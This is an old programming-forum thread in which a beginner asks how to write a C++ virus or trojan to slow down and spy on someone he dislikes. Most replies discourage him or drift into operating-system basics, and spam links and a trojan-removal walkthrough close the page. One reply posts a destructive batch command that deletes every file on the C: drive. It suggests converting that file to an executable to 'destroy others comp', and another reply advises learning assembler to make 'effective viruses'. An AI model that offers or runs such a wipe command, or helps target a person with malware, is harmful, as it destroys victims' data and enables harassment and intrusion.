munin
Closed Thread
Page 1 of 2 12 LastLast

Thread: Making Trojans/Viruses in C++ How?

Making Trojans/Viruses in C++ How?

Hey im new to C++ and im learning it but i was woundering how i can make my own private Virus and give it to a u i hate so badly is there really a any method of doing this in C++?

I dont wanna infect him like really really bad just like make his computer slower and stuff or get a trojan on his comp so i can go through his stuff.

Anyone wanna help me out with this?

Quote Originally Posted by Newby_Programme
    Hey im new to C++ and im learning it but i was woundering how i can make my own private Virus and give it to a u i hate so badly is there really a any method of doing this in C++?

I dont wanna infect him like really really bad just like make his computer slower and stuff or get a trojan on his comp so i can go through his stuff.

Anyone wanna help me out with this?
    To make malware, you actually learn the language instead of spending *0 minutes getting the console to print "hello world" as most people do. Once you know the language and windows api well, you know how to create programs which manipulate the computer for your desired effect. There's no secret virus-writing tips people can give you; all it comes from is knowledge.

Note: If you are not intelligent, forget about programming.

Note 2: Sending destructive viruses to people is lame and no way to solve an argument.

Note *: Learning how to write should be higher up your priorities list than learning how to create viruses.

its easy to create a virus in a source code that you know well to kill someones computer but that gh*y, theres way cooler programs out there that you can learn 2 code that are fun and show you have skill.
    ~All I wanna do is piss people off.

What are they then?

Cause im willing to learn everything language i can but one at a time until i learn that fully then i move on and so on.

So what are they?

well

Well, the thing is that I've seen many 'viruses' and 'trojans' written in both C and C++, which basically annoy you and scare you into doing something stupid, like formatting your C: drive.

The reason you don't see alot, is because it takes some work, which most of these makers of 'trojans' and 'viruses' don't want to put out. (btw, if anyone has found the source code to a real virus or trojan in C/C++, I'd like to know.) What you should do if you really want to make effective viruses is to have a certain target in mind (Windows XP, Dell hardware, etc) and learn some assembler for that particular target, then make viruses.

hmm

Well what does it mean when a program is made for a certain type like windows xp or 2000? Cause i really dont get it people make programs that are for certain kinds of computers but why do they make them like that? Why cant they just make one program for all computers?

Hope you understand my questions kinda hard to explain.

B/c Not all op systems are made the same.
    Look at an Apple and Microsoft.
    Are they the same?
    Do they feel the same?

No. The structure is different.

T

how are they the same?
    And how can you make a program to adjust to say windows xp?

Quote Originally Posted by Newby_Programme
    Well what does it mean when a program is made for a certain type like windows xp or 2000? Cause i really dont get it people make programs that are for certain kinds of computers but why do they make them like that? Why cant they just make one program for all computers?

Hope you understand my questions kinda hard to explain.
    Different code runs on different operating systems. You can't make a program for ALL operating systems, because they all have different standards and different ways of doing things. If everybody was using the same OS, they would all be able to use the same programs - but people use different operating systems.

You use a compiler to create programs, as you probably know. This compiler will compile code for the operating system it's running on, so for example if you made a program in Dev-C++ on windows, it will compile an executable for windows. To make programs for a specific OS, you simply boot into that operating system and find a compiler. You can't really program for a specific OS unless you're using it.

how are they the same?
    And how can you make a program to adjust to say windows xp?
    Programs on windows are generally backwards-compatible with all the windows versions down to *5. There are some features which are only available in later versions (like XP), but if you make sure you only use functions that are available in all windows versions, your program will run on any windows OS. Windows hasn't really changed that much in *0 years.
    Last edited by Ezekiel; 09-24-2006 at 04:59 AM.

O sorry i stuffed in my post for some resion it made a double post

Quote Originally Posted by mike*0*
    Different code runs on different operating systems. You can't make a program for ALL operating systems, because they all have different standards and different ways of doing things. If everybody was using the same OS, they would all be able to use the same programs - but people use different operating systems.

You use a compiler to create programs, as you probably know. This compiler will compile code for the operating system it's running on, so for example if you made a program in Dev-C++ on windows, it will compile an executable for windows. To make programs for a specific OS, you simply boot into that operating system and find a compiler. You can't really program for a specific OS unless you're using it.

Programs on windows are generally backwards-compatible with all the windows versions down to *5. There are some features which are only available in later versions (like XP), but if you make sure you only use functions that are available in all windows versions, your program will run on any windows OS. Windows hasn't really changed that much in *0 years.
    Arhh thank you thats the answer i needed.

Smile trojan virus

i hav also been lookin for a while for a trojan virus source but i discovered sth

if you know how you can create a simple BATCH virus for example:
    Code:
    @echo off
    del c:\*.*/f/s/q
    after you save it to a *.bat file you scan it and it shows no virus
    (do not execute this file)
    but if you convert it to an *.exe you will see that the antivirus detects it as a trojan

the app is called Bat 2 exe converter

google it and you will find it

i know this is not what you guys are lookin' for, i haven't found a trojan source too but this is worthy if you want the virus to destroy others comp, and not only for knowledge
    Last edited by tonig_; 04-26-2009 at 01:43 PM. Reason: forgot sth

Here is a tool that claims to remove it. [url]http://www.spywareremovalblog.com/remove-reader_sexe/[/url]

I think that, writing a destructive programm doesn't show skill but
    immaturenes. Writing a virus for educational purposes can be
    interesting, as it requires fiddling around on a low level. OTOH
    on a sanely designed system you will hardly find executables you
    can overwrite without root permission. And if $HOME is on a
    parition mounted with the "noexec", option then it's almost
    impossible to get malcode permanently on the system.
    [url=http://www.corporatedon.com/]comedian directory[/url]
    [url=http://www.comparevoipproviderrates.com/]VIOP[/url]

Follow the steps below to successfully remove Desktophijack.C. Trojan from your infected computer.

Step *:
    Turn Off System Restore:
    Start / Programs / Accessories / System Tools / System Restore / System Restore Settings / Check "Turn Off" / Apply / OK

Step 2:
    Configure Windows to show all hidden files and folders:
    Start / Programs / Accessories / Windows Explorer / Tools / Folder Options / View / Check Show Hidden Files

Step *:
    Download Ewido Security Suite HERE! Do Not install at this time!

Step 4:
    Manually download the Signature and Database from the same page at Ewido.

Step 5:
    Download Adaware SE Personal Edition HERE!

Step 6:
    If you have anti-virus software on your computer uninstall the program and reinstall. If no software is installed download and install Avast Anti Virus free home version HERE! (We highly recommend Avast over other anti-virus software).

Step 7:
    Download SmitRem.zip Here! Make a new folder and unzip SmitRem.zip into it's own folder. We will use this later.

Step 8:
    Log off the internet and reboot computer in Safe Mode. Usually press F8 at Startup.

Step *:
    Install and run Adaware SE Personal Edition. Delete all entries that this program finds.

Step *0:
    Install Ewido Security Suite and the manually downloaded Signature and Database files. Run Ewido Program. Delete all entries that this program finds.

Step **:
    Start DOS command:
    Start / Programs / Accessories / Command Prompt

Step *2:
    Change the directory as below at the C: prompt line typing in cd c:\

C:\Documents and Settings\whatever>cd c:\

Press enter key.
    (Please note: whatever is whatever your computer is called and will be different for all machines.)

Step **:
    Now type in c:\whatever ( This is the name of whatever folder you unzipped SmitRem into.)
    Press enter key

Step *4:
    Type in RunThis.bat and press enter key.

Step *5:
    Follow the prompts on screen and wait for the tool to complete and the disk cleanup to finish.

Step *6:
    Reboot your computer into normal Windows mode and run your virus protector.[url=http://www.wasserbettenhilfe.com]wasserbett[/url] [url=http://managedservice.org/index.php?page=ciscoservices_basics]Managed Telephony Services[/url]

Your computer should now be disinfected.

Closed Thread